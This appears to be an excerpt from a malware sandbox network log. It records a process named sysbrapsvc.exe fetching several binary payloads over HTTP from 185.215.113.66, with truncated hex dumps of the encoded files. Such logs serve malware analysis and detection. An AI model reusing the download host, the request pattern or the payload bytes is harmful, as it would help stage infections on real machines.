                                                                              May 8, 2024 15:22:48.428985119 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:22:48.429682970 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:22:48.429697990 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:22:48.429739952 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:22:48.429753065 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB
                                                                              May 8, 2024 15:22:54.529365063 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:54.869136095 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:54 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:22:54.869206905 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:22:54.869303942 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:22:54.869362116 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.849717185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:48.681726933 CEST274OUTGET /3 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: 185.215.113.66
                                                                              Connection: Keep-Alive
                                                                              May 8, 2024 15:22:49.024024010 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:48 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 81928
                                                                              Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "662995f1-14008"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 f7 01 b2 60 0c 25 58 36 49 b9 34 23 91 28 4e 72 ab 02 06 2a ee b3 46 54 3e 3a 68 4e 47 4a 0c 37 91 b7 a4 1b 38 a1 9a e0 b0 c4 fe 21 20 44 58 a6 82 6d cd 53 58 f1 3b ac 19 89 a1 3d 8b 90 83 b4 71 ef eb 13 7a 28 73 20 51 f4 00 23 77 f7 2b 57 60 82 4a 56 6a 86 65 65 f4 3b 70 d7 7e e1 94 a3 80 aa 9f 61 33 fa c2 5f 90 b0 88 84 2c b5 14 92 38 68 0a 3a f6 a8 e8 70 3c 63 fa 87 27 43 2b f1 17 2e 48 bc 40 39 94 d5 09 2e 37 61 67 27 e3 d9 d7 11 b1 73 b6 44 ee a1 48 67 ce 3b 0d 47 de 6c 49 99 78 8e 32 06 7e cb 06 99 e2 8b b5 22 65 91 47 ca 9b f4 f8 70 e1 34 32 30 ab 66 24 ff 18 2d 2a ab a4 8e 3e 8f 4e 6f f9 37 ff 23 0c bf fa 23 74 76 8a c0 5b 91 ba 64 3c ba 64 84 a9 8a 05 47 f3 ae 16 c6 d5 ac f8 f2 e3 22 12 89 76 35 e9 23 19 da 63 c6 f6 7c eb 00 02 5d a9 90 93 72 c1 57 89 70 e8 c7 c7 ff 7e f7 25 72 e0 5b 68 5a 13 5f db 38 e3 e0 b0 df b4 6c f2 6c 3f 6c 32 2c 82 bf c0 0e 20 00 01 74 e7 94 6e d0 d7 31 4b fa 19 92 fa 71 85 57 70 41 0d c0 65 20 72 73 20 94 9c e7 af b6 92 a0 3f 21 39 04 9a db [TRUNCATED]
                                                                              Data Ascii: NGS!`%X6I4#(Nr*FT>:hNGJ78! DXmSX;=qz(s Q#w+W`JVjee;p~a3_,8h:p<c'C+.H@9.7ag'sDHg;GlIx2~"eGp420f$-*>No7##tv[d<dG"v5#c|]rWp~%r[hZ_8ll?l2, tn1KqWpAe rs ?!9s,i}G:x} M]:wTU+v*@V-7m+j!LqmJmVHiYHq[JG1j\Z+J2[?#fzYV"9(UWIJ's-OW`o0pmRVaj;wm57*iWysesZ5{(|+tDo>DQbd.W}@^=w%}C?2EN4jfi/kOppZ6I$aJ_/028M*J0y!=g[v]c@9d^H2~l(pc-'7JagPYP.mt&/btva}gfu;'Z~[Vn~5RkM@q/:=`:G^'CT<Czv`b=/>&-U|pjM,/fWO4]9D-\F'bOQW`6sb_ [TRUNCATED]
                                                                              May 8, 2024 15:22:49.024044991 CEST1289INData Raw: 28 55 b0 14 8d 25 75 01 4e 4d c0 61 ac 41 b4 b2 02 db 28 1b 34 b9 e4 3d 5a ba a7 41 58 c9 72 51 09 58 06 57 a5 6a 1d a6 dc db 3c 54 91 a4 f0 53 ee c7 b4 4c 31 29 c9 3b 7d 28 06 68 a2 46 ea 8f 96 45 61 a0 bd ec 9d 9e b3 9f b9 6f db 99 91 9e cc ab
                                                                              Data Ascii: (U%uNMaA(4=ZAXrQXWj<TSL1);}(hFEao@@s3poh[Z6~E7Y\YdQ87$>/v2/'jIA*i$ZtBa4PdG5KQ^(,q{:)CYd;}U:
                                                                              May 8, 2024 15:22:49.024104118 CEST1289INData Raw: 73 80 0b b2 b8 b4 ed b4 ec 6c 6e 29 64 94 41 b8 c2 5b fe a0 26 a2 02 7f 86 2b d0 b5 9d 1b c4 eb 99 d1 84 a5 c4 9b e4 4a 3f ae 54 38 64 fd 73 7b bc b0 b7 f7 35 22 98 66 d9 e0 9c 2c 14 4c 63 dd 51 30 2a 35 e5 bd c5 71 38 09 82 3b 49 c8 cb 06 d7 be
                                                                              Data Ascii: sln)dA[&+J?T8ds{5"f,LcQ0*5q8;IW5F_E,`uvybARUBv@5:{sU~wLFy~I3z?>Twh,GY(@5D?39wne5Fud!Ji
                                                                              May 8, 2024 15:22:49.024142027 CEST1289INData Raw: c4 bb 2d ef 3e bc d7 cf 85 b5 61 42 c9 31 64 7b 11 00 a5 c9 ec bc 34 06 66 4e 0f 74 8f 73 02 53 34 4b 68 9c c2 bc c8 87 b4 4d 97 89 8e b7 7d ce 64 8b 08 fe a7 b9 04 ca a1 ad e8 0e 46 11 2f 0b 88 83 36 8f a2 c3 5b d6 10 ae bb 3d d8 38 cf 91 4f ed
                                                                              Data Ascii: ->aB1d{4fNtsS4KhM}dF/6[=8O^b$/lb8nfD;AzN=O'F+~gV#q*(*(%d]d!E)xJ:.Ku[_ofLVQiGA*x
                                                                              May 8, 2024 15:22:49.024156094 CEST1289INData Raw: 47 61 a6 d7 8b e2 18 06 d4 a0 0f 77 f1 a8 b0 18 f4 e7 aa e1 f4 10 d3 6c 24 a6 92 4a 95 43 61 2d 33 b6 ea 6c 67 db 6c f1 95 8b c3 ca 0a d3 82 4b 20 b2 2c 8a 71 ed 28 57 22 b0 3e cf fd 51 37 9e 01 db db 71 df 58 6e e1 04 c1 79 7e b7 1d e7 32 64 68
                                                                              Data Ascii: Gawl$JCa-3lglK ,q(W">Q7qXny~2dhr.1N5dN]YIZ]svq|1bT0T2L>Kk`]H4X"kD/e6o[&/RcKT_N`MGmtocl;-EH-t JbB
                                                                              May 8, 2024 15:22:49.024173975 CEST1289INData Raw: 19 15 22 5a d7 57 6d 08 b4 ae a5 2d 9c 05 b2 e7 76 a1 88 d8 95 a0 92 12 78 8c 9e 84 bb 25 c3 0e ea 62 c0 e8 67 46 ce f2 85 e2 86 aa 56 e3 03 22 c9 e8 1c d4 fd 1d f3 66 d5 d2 6e a9 8f db d2 fb 8e 6c 5a 7c e2 ea 43 e3 75 e5 ab 3a 6b 8b 08 76 b5 e4
                                                                              Data Ascii: "ZWm-vx%bgFV"fnlZ|Cu:kvG\Cd!9s$Wvbc{Lz4p%+2&m=J LE9Kl64H"~c/`J'tSy
                                                                              May 8, 2024 15:22:49.024188995 CEST1289INData Raw: cf ac a7 be eb 73 e4 d3 ed 5b 03 72 0a 74 77 67 b8 06 90 b3 68 26 cd 09 26 77 da e1 de 04 4a 31 c4 2a f5 4e d0 17 74 d1 64 56 8a 35 52 8e a2 c2 49 84 cb d5 ba 8a de 29 c8 64 33 1d ea 1f 9d 54 a4 dc a7 44 ad 90 58 ad 3d ed d8 e9 11 8b bf 96 37 2b
                                                                              Data Ascii: s[rtwgh&&wJ1*NtdV5RI)d3TDX=7+_TDx*dMT&J&XhG0{lwY]u</08I}F?yJxis}{2?FqiI]'Vv0KK'C_`B/E$=k5\$8
                                                                              May 8, 2024 15:22:49.024203062 CEST1289INData Raw: 18 ea 62 90 fb d4 85 d0 ad 0c ca 89 b2 53 60 05 7d 76 96 c6 1b 11 21 ee b4 7a fb 80 51 ed f3 ab 53 d4 03 87 1e e5 51 de b5 72 0c 29 40 27 ef fe 36 61 96 0b 02 9b d9 49 77 04 7e 0b be 98 bd b5 4e 86 ad 27 41 28 99 57 26 9d c5 79 01 3f 69 69 0b 0e
                                                                              Data Ascii: bS`}v!zQSQr)@'6aIw~N'A(W&y?iiz$X2Wq&44o#H<uwV5pWv;}]rxsi3}'/_:4!0EUD7H\l9B-uLr3%3)"iKYw_3b1!]/
                                                                              May 8, 2024 15:22:49.024250984 CEST1289INData Raw: 98 f8 17 51 a5 46 a9 06 8f 70 7e d1 56 4e 09 36 93 48 63 2d e4 5e 59 fe 7f d8 01 fc 73 11 04 eb 66 af 5f 05 e8 fa 5e 30 56 18 e8 12 c0 d7 0f 05 48 45 9f 97 4f b9 c8 ba a5 74 d5 06 3f 27 fd 27 2d af 17 cb 93 d8 14 f2 53 f2 fa 4e 30 b9 7c 59 d9 07
                                                                              Data Ascii: QFp~VN6Hc-^Ysf_^0VHEOt?''-SN0|Ye"I@/&'pz251my 50Ki8HP38FG^ZOEV-sOSBSp1@JlgTJrJg6gGwE\Wg
                                                                              May 8, 2024 15:22:49.024271011 CEST1289INData Raw: 41 d9 38 85 ee da 1f 10 58 78 ef c3 e6 5f 03 31 de e6 ca fb a1 25 b6 07 9d 1b b2 31 a6 4b f2 95 cf 45 5a 45 f9 ea 7f ba c1 4d b7 5b d9 ed 98 aa 58 ac f9 58 2c a7 8c 2a c0 64 76 05 f9 ea 6b 0c 6e a7 cc 9f 95 3a 5f 91 fe 5f 03 e9 99 02 db a3 ae cd
                                                                              Data Ascii: A8Xx_1%1KEZEM[XX,*dvkn:__p:2@{<@W^Y9UaKJ}_{J5J=N2)kF zXlyd}72iZbEkzf2<Meo9"fbuDgI:65+Zn(ylM
                                                                              May 8, 2024 15:22:49.366421938 CEST1289INData Raw: 04 f1 04 68 70 6d 25 a5 24 64 db 9c 1f 55 9b bb d5 7d 93 b6 b0 59 82 37 48 16 39 7d 95 ba d9 9a 0c e1 8a 9d ec 79 73 e1 b9 9e 01 ac 65 4e 76 07 47 59 6c eb 1a d5 8b f7 6c ba 2b bc 78 f5 54 f8 96 58 43 5d af 42 06 be 91 8b 5c d1 3e 11 89 bf 48 2b
                                                                              Data Ascii: hpm%$dU}Y7H9}yseNvGYll+xTXC]B\>H+8Y?vROQT$O<8c8]>!nxQt1K=Tm`loww?#@!C9/WHO+Rnym:|5`Dd{K/(Y?
                                                                              May 8, 2024 15:22:51.787626982 CEST166OUTGET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:52.129470110 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:51 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 22272
                                                                              Last-Modified: Wed, 08 May 2024 11:20:38 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6006-5700"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 9f 99 07 20 de 8d 44 f2 f6 13 df bc 7b 00 82 92 55 ab c0 21 68 c7 50 d3 19 59 e0 1a 73 e0 76 26 1b b0 8d 43 32 3a 53 97 36 02 bd b0 9d 94 d9 d9 e6 c8 59 cf e0 0e 72 c6 32 5a 9e 9f 97 7c cb 13 c9 e0 19 a5 09 12 87 cb ba 5b 7a e5 af 4d 86 e0 bc 1a 77 78 74 51 85 f5 3f e6 db 6b fc 38 23 e2 47 60 66 86 05 46 d4 d0 61 58 4d 7c 07 df 73 3a ff d9 2e a2 ab f2 89 a6 a5 fe 3f 10 d7 d2 54 e1 66 4c 7f c2 68 a8 2a 13 33 94 81 3c fe a8 55 4d 30 cd 47 a2 f1 35 9b 01 8a 74 b0 79 40 30 5e 56 b0 85 7c ea 4e 29 48 f8 b5 08 05 e7 2b cc 4c d6 f1 a7 9c 9d ed 33 a6 83 5c 4c ce 95 bd fb 74 2d e0 f4 7c fb 1e a8 da 7e b5 55 ad 3b 19 3b a0 c7 ff 22 a0 25 c0 02 20 9c c5 34 2b 3a 79 64 b2 1e 6b 85 de fc 1e 68 5f 98 1a f2 cf 49 c5 25 68 e5 3a 17 ab 13 f7 3b 97 e5 9b 39 16 54 78 41 b6 0c d2 97 ee 7f 2c c9 d6 d3 8c 0d 2e 2e 84 7e 43 b0 7d 2b a8 38 2a 03 a8 92 0a 7a b1 c5 c4 b4 12 c1 9b 29 d1 bd 69 42 b3 09 6c 81 d3 fc 77 f6 47 df 9f 8c 6d 12 1f 88 fb 8c 9f 6b 37 3b ec 4c 7e 36 f7 34 fa 50 ee 6a 0d 7c 09 14 68 b2 73 50 76 bc dc 4e [TRUNCATED]
                                                                              Data Ascii: D{U!hPYsv&C2:S6Yr2Z|[zMwxtQ?k8#G`fFaXM|s:.?TfLh*3<UM0G5ty@0^V|N)H+L3\Lt-|~U;;"% 4+:ydkh_I%h:;9TxA,..~C}+8*z)iBlwGmk7;L~64Pj|hsPvN(~&rf&5a|7{Jt\JW be)k1:Z7Np'P=Q84Dx8As.bi$56R2*)K3WLZpP&&J{=.cCzhZjBB[!N>:.9*v=LFC#GO\ Y6S{gf|=zlA=R0Dqh}RN@yWhQTWTDS{9IYAfE",K*UtKh)3/f4QWi#@NZ~qPp63!cEeV6T8`k?)x\]<SbA2xK? X&|Lxvg(8YD.NL+o=(zuj2@Jj'6=m;A?<JX+K^($1i+:R2|qnCo4jd=Gs%/'A+h"wji*>*b [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.849718185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:53.487994909 CEST166OUTGET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:53.829191923 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:53 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 22272
                                                                              Last-Modified: Wed, 08 May 2024 11:20:38 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6006-5700"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 9f 99 07 20 de 8d 44 f2 f6 13 df bc 7b 00 82 92 55 ab c0 21 68 c7 50 d3 19 59 e0 1a 73 e0 76 26 1b b0 8d 43 32 3a 53 97 36 02 bd b0 9d 94 d9 d9 e6 c8 59 cf e0 0e 72 c6 32 5a 9e 9f 97 7c cb 13 c9 e0 19 a5 09 12 87 cb ba 5b 7a e5 af 4d 86 e0 bc 1a 77 78 74 51 85 f5 3f e6 db 6b fc 38 23 e2 47 60 66 86 05 46 d4 d0 61 58 4d 7c 07 df 73 3a ff d9 2e a2 ab f2 89 a6 a5 fe 3f 10 d7 d2 54 e1 66 4c 7f c2 68 a8 2a 13 33 94 81 3c fe a8 55 4d 30 cd 47 a2 f1 35 9b 01 8a 74 b0 79 40 30 5e 56 b0 85 7c ea 4e 29 48 f8 b5 08 05 e7 2b cc 4c d6 f1 a7 9c 9d ed 33 a6 83 5c 4c ce 95 bd fb 74 2d e0 f4 7c fb 1e a8 da 7e b5 55 ad 3b 19 3b a0 c7 ff 22 a0 25 c0 02 20 9c c5 34 2b 3a 79 64 b2 1e 6b 85 de fc 1e 68 5f 98 1a f2 cf 49 c5 25 68 e5 3a 17 ab 13 f7 3b 97 e5 9b 39 16 54 78 41 b6 0c d2 97 ee 7f 2c c9 d6 d3 8c 0d 2e 2e 84 7e 43 b0 7d 2b a8 38 2a 03 a8 92 0a 7a b1 c5 c4 b4 12 c1 9b 29 d1 bd 69 42 b3 09 6c 81 d3 fc 77 f6 47 df 9f 8c 6d 12 1f 88 fb 8c 9f 6b 37 3b ec 4c 7e 36 f7 34 fa 50 ee 6a 0d 7c 09 14 68 b2 73 50 76 bc dc 4e [TRUNCATED]
                                                                              Data Ascii: D{U!hPYsv&C2:S6Yr2Z|[zMwxtQ?k8#G`fFaXM|s:.?TfLh*3<UM0G5ty@0^V|N)H+L3\Lt-|~U;;"% 4+:ydkh_I%h:;9TxA,..~C}+8*z)iBlwGmk7;L~64Pj|hsPvN(~&rf&5a|7{Jt\JW be)k1:Z7Np'P=Q84Dx8As.bi$56R2*)K3WLZpP&&J{=.cCzhZjBB[!N>:.9*v=LFC#GO\ Y6S{gf|=zlA=R0Dqh}RN@yWhQTWTDS{9IYAfE",K*UtKh)3/f4QWi#@NZ~qPp63!cEeV6T8`k?)x\]<SbA2xK? X&|Lxvg(8YD.NL+o=(zuj2@Jj'6=m;A?<JX+K^($1i+:R2|qnCo4jd=Gs%/'A+h"wji*>*b [TRUNCATED]
                                                                              May 8, 2024 15:22:53.829298973 CEST1289INData Raw: 93 5f 6b ef 50 05 9e 69 25 3f 3f 17 47 85 2c 6b 90 92 25 c7 a4 33 c7 b4 ac 01 9f 3c 52 af 59 f7 8f 8c b2 8a 34 83 28 21 34 2c 08 b5 72 a3 55 ed 44 21 fc 8e 2b ad 22 49 d4 df 89 7f 22 e5 ce 47 01 f3 e1 b7 6a 95 90 ad a6 27 76 0c 70 18 34 86 d8 a7
                                                                              Data Ascii: _kPi%??G,k%3<RY4(!4,rUD!+"I"Gj'vp494lqQ " [t%/ ,2wUJSxon2F;DI`yMis)p#{x1mWRHFpwYmv.J]%x;U'i%?^`}ihtPA
                                                                              May 8, 2024 15:22:53.829318047 CEST1289INData Raw: 1c c3 ae 56 be 98 01 6b 9c 1a 7b 08 4e 4a 39 5c 07 87 b3 5b 4f 13 bd 3b 89 f5 de 91 7a 53 87 d5 e3 12 66 87 50 62 62 19 16 47 a1 87 f9 8f 51 ef 1e 4c dd 49 0a 9c c2 51 5f ab bf 5f b4 35 c7 5a 28 84 16 e7 9a 31 36 4e dd 67 f8 5e e6 4a 7b c3 bf 40
                                                                              Data Ascii: Vk{NJ9\[O;zSfPbbGQLIQ__5Z(16Ng^J{@>!HvxGA#J=$SI7l(f^43<P7Xic&mRwaRX_wj15^W:nkv0ExG"F&XI'7K7E"4 gX
                                                                              May 8, 2024 15:22:53.829340935 CEST1289INData Raw: 4f 94 78 c2 97 9b 63 5e be 60 17 93 29 44 bc d5 ec a9 b6 b4 08 90 51 3b 5d 99 88 3b 5e 0f 58 59 77 af 85 ff 08 65 fb e3 41 d7 e2 f9 54 96 02 47 8a ce 86 0b 91 33 f7 77 7b 52 57 56 74 07 cd bb f0 14 bb 02 b2 59 41 06 90 c8 43 63 75 9f 12 f7 70 b7
                                                                              Data Ascii: Oxc^`)DQ;];^XYweATG3w{RWVtYACcup__BTY,q"KGCQ3c0QC/|xB.Lv?X;Wg;cJrm%3Spc[!%dt y>yw{%dg)(Yr]srX!z
                                                                              May 8, 2024 15:22:53.829361916 CEST1289INData Raw: bb fc df 8d e3 0f af 38 97 7e 3c 5b 6a cb 09 b4 59 74 22 8d fb a9 0d f1 60 29 df 4e 90 14 35 9a 75 0a 76 65 4c b0 d5 9a 19 e2 87 dc e0 08 6c 3e d0 b6 f5 62 5c c2 fa 20 19 ef 55 b1 e0 ff 82 1b bf b5 10 12 e3 25 c3 9b 9d 61 84 57 33 23 b2 87 f1 d7
                                                                              Data Ascii: 8~<[jYt"`)N5uveLl>b\ U%aW3#|puO"^?,C5cRaCO($yf"[GH7me0_[1Da$q9&{|oj5o6vT(eWnS-kI<ZV#~sX
                                                                              May 8, 2024 15:22:53.829379082 CEST1289INData Raw: aa 7c 5a 5d 16 d5 71 76 1e 04 c2 b4 d4 90 34 09 eb 56 cd 7d 84 8a 26 c8 b1 15 0d 92 67 ca fe b5 0f b7 5c cc 00 c7 55 08 91 20 53 0e 48 8e e0 75 2e 1a e9 cb 22 b9 eb bc 82 2c 7a 68 56 bd 3a 42 de 02 c6 de 61 ff 10 46 0a 83 2d 97 2a 29 9e 7b 31 05
                                                                              Data Ascii: |Z]qv4V}&g\U SHu.",zhV:BaF-*){1:eU{TjoM{;4gb\rxa"-)*K,K\Id-J\x/AT^)cv_21sc|u7l&{oIt<'2IU;?!E<
                                                                              May 8, 2024 15:22:53.829396963 CEST1289INData Raw: ff 96 34 ff be 9f d7 1d 17 ae 97 a3 e3 1f 25 28 7f a0 76 42 96 9e 6b b3 fb 60 26 c6 18 ac ad fe b7 7a 33 c2 a5 df e6 1a 43 e0 e2 cb e8 3f 38 1c db 04 16 a1 a1 17 a5 e7 10 cb 46 d6 d5 05 02 4d 80 0d ec d3 b7 fc 89 ae ee 3c cb 96 1f cf ef 7f e1 75
                                                                              Data Ascii: 4%(vBk`&z3C?8FM<ue\`O?)m<[nh7RpUT j%#0JjyAsY@Vy8jmtf"|y#3)JG<*0YnhP,I#]a%>+Y
